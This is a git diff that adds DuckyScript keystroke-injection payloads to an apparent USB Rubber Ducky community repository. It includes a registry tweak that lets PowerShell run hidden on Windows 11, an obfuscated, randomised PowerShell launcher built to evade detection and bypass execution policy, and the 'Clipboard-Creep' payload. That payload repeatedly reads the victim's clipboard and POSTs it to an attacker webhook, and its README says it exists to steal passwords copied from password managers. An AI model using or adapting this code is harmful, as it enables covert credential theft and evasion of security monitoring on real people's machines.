diff --git a/payloads/extensions/community/Detect_Finished b/payloads/extensions/community/Detect_Finished new file mode 100644 index 000000000..2bf114f18 --- /dev/null +++ b/payloads/extensions/community/Detect_Finished @@ -0,0 +1,31 @@ +EXTENSION Detect_Finished + REM VERSION 1.0 + REM AUTHOR: 0iphor13 + + REM_BLOCK DOCUMENTATION + USAGE: + Use the function Detect_Finished() to signal the finished execution of your payload. + END_REM + + REM CONFIGURATION: + DEFINE #PAUSE 150 + FUNCTION Detect_Finished() + IF ($_CAPSLOCK_ON == FALSE) + CAPSLOCK + DELAY #PAUSE + CAPSLOCK + DELAY #PAUSE + CAPSLOCK + DELAY #PAUSE + CAPSLOCK + ATTACKMODE OFF + ELSE IF + CAPSLOCK + DELAY #PAUSE + CAPSLOCK + DELAY #PAUSE + CAPSLOCK + ATTACKMODE OFF + END_IF + END_FUNCTION +END_EXTENSION diff --git a/payloads/extensions/community/Windows11_Console_Downgrade b/payloads/extensions/community/Windows11_Console_Downgrade new file mode 100644 index 000000000..5980a6240 --- /dev/null +++ b/payloads/extensions/community/Windows11_Console_Downgrade @@ -0,0 +1,35 @@ +EXTENSION Windows11_Console_Downgrade + REM_BLOCK + Version: 1.0 + Author: 0iphor13 + Description: Downgrade the default command prompt of Windows 11 to use Conhost again. + Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again. + END_REM + + REM CONFIGURATION: + REM Used to wait until initial execution + DEFINE #INPUT_WAIT 2000 + REM GUID for using the legacy console host for terminal execution + DEFINE #CONHOST B23D10C0-E52E-411E-9D5B-C09FDF709C7D + + FUNCTION Console_Downgrade() + DELAY #INPUT_WAIT + GUI r + DELAY 500 + STRINGLN powershell -NoP -NonI + DELAY 1000 + STRING Set-ItemProperty -Path "HKCU:\Console\%%Startup" -Name DelegationConsole -Value "{#CONHOST}"; + STRINGLN Set-ItemProperty -Path "HKCU:\Console\%%Startup" -Name DelegationTerminal -Value "{#CONHOST}";exit + END_FUNCTION + + REM_BLOCK + EXAMPLE USAGE AFTER EXTENSION: Downgrade the command prompt via registry, then open a hidden PS instance and execute Calc.exe. + Console_Downgrade() + DELAY 2000 + GUI r + DELAY 2000 + STRINGLN powershell -w h + DELAY 1500 + STRINGLN calc.exe;exit + END_REM +END_EXTENSION diff --git a/payloads/extensions/community/windows_elevated_execution b/payloads/extensions/community/Windows_Elevated_Execution similarity index 100% rename from payloads/extensions/community/windows_elevated_execution rename to payloads/extensions/community/Windows_Elevated_Execution diff --git a/payloads/library/exfiltration/ClipBoard-Creep/README.md b/payloads/library/exfiltration/ClipBoard-Creep/README.md new file mode 100644 index 000000000..67cc32ba3 --- /dev/null +++ b/payloads/library/exfiltration/ClipBoard-Creep/README.md @@ -0,0 +1,17 @@ +# Clipboard-Creep # +Clipboard-Creep is a basic script which tracks the users clipboard and exfiltrates it contents. It was created to get access to passwords copied out of password managers, but might be useful in general. + + +## Usage ## +### #HOOK ### +Define your webhook under #HOOK + +![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png) + +### #CALLBACK_DELAY ### +Define a timer under #CALLBACK_DELAY. This defines the pause between calls to your webhook. A default of 12 seconds was choosen to capture potential passwords, in clipboards of password managers. + +![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png) + +After successful execution you'll see the contents of your targets clipboard or simply signs of life flying into your webhook. +![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png) diff --git a/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png b/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png new file mode 100644 index 000000000..faa52c9dc Binary files /dev/null and b/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png differ diff --git a/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png b/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png new file mode 100644 index 000000000..c3ce4886e Binary files /dev/null and b/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png differ diff --git a/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png b/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png new file mode 100644 index 000000000..932dc1d70 Binary files /dev/null and b/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png differ diff --git a/payloads/library/exfiltration/ClipBoard-Creep/payload.txt b/payloads/library/exfiltration/ClipBoard-Creep/payload.txt new file mode 100644 index 000000000..a9a01dc04 --- /dev/null +++ b/payloads/library/exfiltration/ClipBoard-Creep/payload.txt @@ -0,0 +1,211 @@ +REM Clipboard-Creep +REM Version 1.0 +REM OS: Windows +REM Author: 0iphor13 +REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum +REM This payload aims on the targets clipboard. Define a webhook plug in your payload and observe the clipboard content on your catching server. +REM Based on Clipboard-Creep.ps1 - https://github.com/0iphor13/ClipBoard-Creep + + +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION + +EXTENSION EXTENSION Rolling_Powershell_Execution + REM VERSION 1.0 + REM Author: 0iphor13 + REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek + REM Requirements: PayloadStudio v.1.3 minimum + REM Starts Powershell in uncommon ways to avoid basic detection + REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection. + + REM CONFIGURATION: + REM Add ExecutionPolicy bypass + DEFINE #EXECUTIONPOLICY FALSE + DEFINE #DELAY 500 + + $_RANDOM_MIN = 1 + $_RANDOM_MAX = 16 + VAR $RANDOM_PS = $_RANDOM_INT + FUNCTION Rolling_Powershell_Execution() + IF ($RANDOM_PS == 1) THEN + STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid" + ELSE IF ($RANDOM_PS == 2) THEN + STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi" + ELSE IF ($RANDOM_PS == 3) THEN + STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi" + ELSE IF ($RANDOM_PS == 4) THEN + STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H" + ELSE IF ($RANDOM_PS == 5) THEN + STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi" + ELSE IF ($RANDOM_PS == 6) THEN + STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD" + ELSE IF ($RANDOM_PS == 7) THEN + STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi" + ELSE IF ($RANDOM_PS == 8) THEN + STRING powershell -NoPro -noninT -win h + ELSE IF ($RANDOM_PS == 9) THEN + STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD" + ELSE IF ($RANDOM_PS == 2) THEN + STRING powershell.exe -NoP -nOni -W h + ELSE IF ($RANDOM_PS == 10) THEN + STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H" + ELSE IF ($RANDOM_PS == 11) THEN + STRING powershell -nopr -noninT -W HiddEn + ELSE IF ($RANDOM_PS == 12) THEN + STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi" + ELSE IF ($RANDOM_PS == 13) THEN + STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h" + ELSE IF ($RANDOM_PS == 14) THEN + STRING powershell -noproF -noni -W Hi + ELSE IF ($RANDOM_PS == 15) THEN + STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi" + ELSE ($RANDOM_PS == 16) THEN + STRING powershell.exe -noP -nOnI -windo H + END_IF + + + IF_DEFINED_TRUE #EXECUTIONPOLICY + SPACE + IF (($RANDOM_PS % 2) == 0) THEN + STRING -ep ByPasS + ELSE IF (($RANDOM_PS % 5) == 0) THEN + STRING -exec bypass + ELSE IF (($RANDOM_PS % 7) == 0) THEN + STRING -exeC byPasS + ELSE IF (($RANDOM_PS % 10) == 0) THEN + STRING -exEcUtionPoL bYpaSs + ELSE IF (($RANDOM_PS % 12) == 0) THEN + STRING -exEcUtion bYPaSs + ELSE + STRING -eP BYPaSs + END_IF + END_IF_DEFINED + ENTER + DELAY #DELAY + END_FUNCTION + REM EXAMPLE USAGE AFTER EXTENSION + REM DELAY 2000 + REM GUI r + REM DELAY 2000 + REM Rolling_Powershell_Execution() +END_EXTENSION + +EXTENSION Detect_Finished + REM VERSION 1.0 + REM AUTHOR: 0iphor13 + + REM_BLOCK DOCUMENTATION + USAGE: + Use the function Detect_Finished() to signal the finished execution of your payload. + END_REM + + REM CONFIGURATION: + DEFINE #PAUSE 150 + FUNCTION Detect_Finished() + IF ($_CAPSLOCK_ON == FALSE) + CAPSLOCK + DELAY #PAUSE + CAPSLOCK + DELAY #PAUSE + CAPSLOCK + DELAY #PAUSE + CAPSLOCK + ATTACKMODE OFF + ELSE IF + CAPSLOCK + DELAY #PAUSE + CAPSLOCK + DELAY #PAUSE + CAPSLOCK + ATTACKMODE OFF + END_IF + END_FUNCTION +END_EXTENSION + + +REM Define URL of your catching webhook +DEFINE #HOOK "https://example.com/" +REM Define the pause between calls to your webhook. +DEFINE #CALLBACK_DELAY 12 + +IF ($_OS == WINDOWS) THEN + GUI r + DELAY 1000 + REM randomized and obfuscated way to start powershell + Rolling_Powershell_Execution() + STRINGLN_POWERSHELL + $e = $null + while ($true) + { + $c = Get-Clipboard + if ($c) + { + if ($c -ne $e) + { + $o = "Clipboard content: $c" + irm -Uri #HOOK -Method POST -Body $o + } else + { + $o = "Clipboard content hasn't changed" + irm -Uri #HOOK -Method POST -Body $o + } + $e = $c + } else + { + $o = "Clipboard is empty" + irm -Uri #HOOK -Method POST -Body $o + } + sleep -s #CALLBACK_DELAY + } + END_STRINGLN + ENTER + DELAY 250 + Detect_Finished() +ELSE + ATTACKMODE OFF +END_IF + + + + +